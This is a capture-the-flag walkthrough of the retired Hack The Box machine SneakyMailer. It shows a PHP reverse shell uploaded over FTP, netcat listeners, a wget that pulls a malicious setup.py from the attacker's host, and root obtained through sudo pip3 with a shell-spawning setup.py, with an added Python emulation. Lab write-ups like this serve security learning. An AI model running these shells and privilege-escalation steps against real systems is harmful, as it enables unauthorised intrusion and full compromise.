Hackthebox — SneakyMailer

Summary

Today we have another retired Linux machine, with the IP 10.10.10.197.

Enumeration

root@strike:~# nmap -sC -sV 10.10.10.197
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-12 17:40 EET
Nmap scan report for 10.10.10.197
Host is up (0.11s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: STARTTLS NAMESPACE UTF8=ACCEPTA0001 UIDPLUS ENABLE ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed IMAP4rev1 CAPABILITY OK SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: NAMESPACE UTF8=ACCEPTA0001 UIDPLUS AUTH=PLAIN ACL IDLE THREAD=REFERENCES ACL2=UNION THREAD=ORDEREDSUBJECT completed CAPABILITY IMAP4rev1 OK ENABLE SORT CHILDREN QUOTA
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.70 seconds
root@strike:~#

That is a lot of open ports for a Linux machine: FTP, SSH, SMTP, HTTP on 80 and 8080, and IMAP on 143 and 993. Port 80 redirects to http://sneakycorp.htb, so that hostname has to be added to /etc/hosts before the web application can be browsed.

While browsing the site I found the page team.php (it also shows up in the FTP listing of the dev directory below).

With the developer credentials I connected to the FTP service and uploaded secwalk.php (a PHP reverse shell) into the dev directory:

root@strike:~# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd dev
250 Directory successfully changed.
ftp> mput secwalk.php
mput secwalk.php? yes
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5490 bytes sent in 0.00 secs (54.5382 MB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
--wxrw-rw- 1 1001 1001 5490 Jul 16 10:40 secwalk.php
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.
ftp>

Start a listener on port 4142 (nc -lnvp 4142), then open the uploaded file in the browser so the web server executes it. The reverse shell connects back as the user developer. Note in the listing above that our upload is owned by uid 1001 while everything else in the directory belongs to root, so the FTP login maps to a separate local account.

After creating the two files (setup.py and .pypirc) in a pypi-pkg directory on our Desktop and serving it over HTTP on port 8000, we need to transfer them to the machine:

developer@sneakymailer:/tmp$ wget -r --no-parent http://10.10.15.33:8000/pypi-pkg
--2020-07-16 10:42:48-- http://10.10.15.33:8000/pypi-pkg
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: /pypi-pkg/ [following]
--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 266 [text/html]
Saving to: ‘10.10.15.33:8000/pypi-pkg’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 266 --.-KB/s in 0s

2020-07-16 10:42:49 (6.19 MB/s) - ‘10.10.15.33:8000/pypi-pkg’ saved [266/266]

Loading robots.txt; please ignore errors.
--2020-07-16 10:42:49-- http://10.10.15.33:8000/robots.txt
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 404 File not found
2020-07-16 10:42:49 ERROR 404: File not found.

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/.pypirc
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 128 [application/octet-stream]
Saving to: ‘10.10.15.33:8000/pypi-pkg/.pypirc’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 128 --.-KB/s in 0s

2020-07-16 10:42:49 (3.21 MB/s) - ‘10.10.15.33:8000/pypi-pkg/.pypirc’ saved [128/128]

--2020-07-16 10:42:49-- http://10.10.15.33:8000/pypi-pkg/setup.py
Connecting to 10.10.15.33:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 565 [text/plain]
Saving to: ‘10.10.15.33:8000/pypi-pkg/setup.py’

10.10.15. 0%[ ] 0 --.-KB/s 10.10.15.33:8000/py 100%[===================>] 565 --.-KB/s in 0s

2020-07-16 10:42:49 (14.4 MB/s) - ‘10.10.15.33:8000/pypi-pkg/setup.py’ saved [565/565]

FINISHED --2020-07-16 10:42:49--
Total wall clock time: 1.0s
Downloaded: 3 files, 959 in 0s (7.86 MB/s)

The files are now on the target:

developer@sneakymailer:/tmp$ ls
10.10.15.33:8000
systemd-private-859f3cb0b4ff454aab770ad4a719628d-systemd-timesyncd.service-CZ3mlI
vmware-root_458-834774610
developer@sneakymailer:/tmp$ cd 10.10.15.33:8000
developer@sneakymailer:/tmp/10.10.15.33:8000$ ls
pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000$ cd pypi-pkg
developer@sneakymailer:/tmp/10.10.15.33:8000/pypi-pkg$ ls -a
. .. setup.py .pypirc

Start a listener on port 2345 on our machine; the payload in setup.py will connect back to it and give us a shell as the user low.

root@strike:~# nc -lnvp 2345
listening on [any] 2345 ...

Now we trigger the package. The .pypirc holds the repository URL and credentials that the upload uses; when the package index on the target processes the uploaded package, its setup.py is executed there. setup.py is ordinary Python that the packaging tools run as a script, so any top-level statement in it runs with the privileges of the account doing the processing.

The payload connects back to our listener and we get a shell as low.

We can now read the user flag.

Privilege Escalation

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3
low@sneakymailer:~$

After some searching I found a blog post on abusing pip3 (the same trick is listed on GTFOBins under pip). pip3 install on a local directory copies it to a pip-req-build-* directory and runs its setup.py as a script, so under sudo a setup.py that spawns a shell spawns it as root. The "sudo: unable to resolve host" warning is harmless. The setup.py below is written with echo inside double quotes, so $(tty) is expanded by our shell at write time and the file contains the literal path of our terminal, which is what the spawned sh is attached to. This only works from a real tty: if tty prints "not a tty", spawn one first (for example python3 -c 'import pty; pty.spawn("/bin/bash")').

low@sneakymailer:~$ TF=$(mktemp -d)
low@sneakymailer:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
low@sneakymailer:~$ sudo pip3 install $TF
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /tmp/tmp.tQid5dJuNf
# bash
root@sneakymailer:/tmp/pip-req-build-9k8kjhct#
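Both the pypi-pkg upload (user shell as low) and the sudo pip3 install step (root shell) rely on the same fact: setup.py is ordinary Python that the installer executes as a script, so any top-level statement runs with the installer's privileges before setup() is even reached. The following is an added example of mine, not code from the original write-up or from the box. It emulates what pip does with a local package directory (copy to a pip-req-build-* temp dir, run setup.py as a script) with setuptools stubbed out so it runs offline and installs nothing, uses a benign marker payload in place of the reverse shell, and reproduces the write-up's tty-shell setup.py as a string for inspection. The function and file names are my own.

```python
import ast
import os
import runpy
import sys
import tempfile
import types


def tty_shell_setup_py(tty_path: str) -> str:
    """The setup.py body from the pip3 privesc above, as a string.
    tty_path is whatever $(tty) expanded to in the shell (e.g. /dev/pts/0).
    The execl runs as soon as the interpreter reaches it, before any setup()."""
    return (
        "import os; os.execl('/bin/sh', 'sh', '-c', "
        f"'sh <{tty_path} >{tty_path} 2>{tty_path}')\n"
    )


def marker_setup_py(marker_path: str) -> str:
    """Benign stand-in for the reverse-shell payload: records the effective
    uid the installer ran it with, then calls setup() like a normal package."""
    return (
        "import os\n"
        "from setuptools import setup\n"
        f"with open({marker_path!r}, 'w') as f:\n"
        "    f.write(str(os.geteuid()))\n"
        "setup(name='pypi-pkg', version='0.1')\n"
    )


def simulate_installer(setup_src: str) -> dict:
    """Emulate pip's handling of a local package directory: write setup.py
    into a pip-req-build-* temp dir and execute it as a script (__main__).
    setuptools is replaced by a stub module so nothing is built or installed
    and no network access is needed (hypothetical emulation, not pip itself)."""
    build_dir = tempfile.mkdtemp(prefix="pip-req-build-")
    setup_path = os.path.join(build_dir, "setup.py")
    with open(setup_path, "w") as f:
        f.write(setup_src)

    metadata = {}
    fake_setuptools = types.ModuleType("setuptools")
    fake_setuptools.setup = lambda **kwargs: metadata.update(kwargs)
    real = sys.modules.get("setuptools")
    sys.modules["setuptools"] = fake_setuptools
    try:
        # Everything at top level of setup.py runs here, with our privileges.
        runpy.run_path(setup_path, run_name="__main__")
    finally:
        if real is None:
            sys.modules.pop("setuptools", None)
        else:
            sys.modules["setuptools"] = real
    return {"build_dir": build_dir, "metadata": metadata}


def demo() -> dict:
    """Run the benign setup.py through the emulated installer and report
    whether its top-level code executed and with which uid."""
    marker = os.path.join(tempfile.mkdtemp(), "ran_as_uid")
    result = simulate_installer(marker_setup_py(marker))
    ran = os.path.exists(marker)
    uid = int(open(marker).read()) if ran else None
    return {
        "executed": ran,
        "uid": uid,
        "same_uid_as_installer": uid == os.geteuid(),
        "package": result["metadata"].get("name"),
    }


def payload_is_valid_python(src: str) -> bool:
    """Sanity-check a generated setup.py before shipping it to the target."""
    try:
        ast.parse(src)
        return True
    except SyntaxError:
        return False


if __name__ == "__main__":
    print(demo())
    print(tty_shell_setup_py("/dev/pts/0"), end="")
```

Run with a plain python3: the marker file shows the payload executed with the caller's uid, which is exactly why the same file run through sudo pip3 install yields a root shell. With real pip the path is the same, only the stub is replaced by the real setuptools and the marker by os.execl.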

We are root and can read the root flag.

If you learned anything useful from this write-up, respect me on HackTheBox.

Thanks for your time!

CTFer | Computer Science Student